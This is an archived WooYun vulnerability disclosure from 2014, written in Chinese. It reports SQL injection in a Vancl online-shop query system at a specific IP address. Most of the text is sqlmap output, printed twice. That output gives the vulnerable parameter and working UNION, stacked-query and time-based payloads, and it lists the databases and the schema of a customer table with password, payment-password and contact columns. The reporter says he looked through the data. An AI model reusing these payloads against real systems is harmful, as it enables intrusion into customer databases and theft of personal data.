乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-28: 细节已通知厂商并且等待厂商处理中 2014-06-02: 厂商已经主动忽略漏洞,细节向公众公开
蝴蝶效应,凡客诚品某重要系统未授权访问,后台注入
http://119.253.53.23/
如图,是凡客诚品 天猫商城查询系统,后来看下,发现注入点http://119.253.53.23/Shelf/Clothes?productCode=
Place: GETParameter: productCode Type: UNION query Title: Generic UNION query (NULL) - 51 columns Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: productCode='); WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: productCode=') WAITFOR DELAY '0:0:5'-----sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: productCode Type: UNION query Title: Generic UNION query (NULL) - 51 columns Payload: productCode=') UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(58)+CHAR(99)+CHAR(110)+CHAR(105)+CHAR(58)+CHAR(113)+CHAR(75)+CHAR(122)+CHAR(113)+CHAR(112)+CHAR(69)+CHAR(73)+CHAR(90)+CHAR(101)+CHAR(76)+CHAR(58)+CHAR(113)+CHAR(97)+CHAR(119)+CHAR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: productCode='); WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: productCode=') WAITFOR DELAY '0:0:5'-----available databases [10]:[*] Customer[*] master[*] model[*] msdb[*] SCM[*] seckill[*] tempdb[*] UnionWebClick[*] Vancl_Advertise[*] VANCL_UNION
Database: SCMTable: dbo.users[48 columns]+-----------------------+----------+| Column | Type |+-----------------------+----------+| Address | nvarchar || Answer | nvarchar || Area | nvarchar || BlackLevel | int || BlackReason | nvarchar || City | nvarchar || CountryID | char || EduLevel | nvarchar || Email | nvarchar || FirstShopping | datetime || IsAgency | smallint || IsBlacklist | bit || IsLock | bit || IsOld | bit || IsReturnBlack | bit || IsValidateEmail | bit || IsValidateMobile | bit || LastIP | nvarchar || LastLogin | datetime || LevelID | int || Mobile | nvarchar || NewID | int || NewUserName | nvarchar || PayPassword | char || Phone | nvarchar || Postalcode | nchar || Province | nvarchar || Question | nvarchar || RegStatus | int || RegTime | datetime || ReturnBlackReason | nvarchar || SetBlackDateTime | datetime || SetBlackReason | int || Sex | int || ShowName | nvarchar || SiteType | int || Source | tinyint || SourceID | varchar || TrueName | nvarchar || uniqueNickName | nvarchar || UserID | int || UserName | nvarchar || UserPwd | nvarchar || UserType | int || Vocation | nvarchar || WebSourceID | int || WebSourceSon_UserName | nvarchar || WebSourceUserName | nvarchar |+-----------------------+----------+
随便翻了翻,感觉里面有料啊,就不继续跑了,大晚上的
来个20rank吧
危害等级:无影响厂商忽略
忽略时间:2014-06-02 09:02
暂无
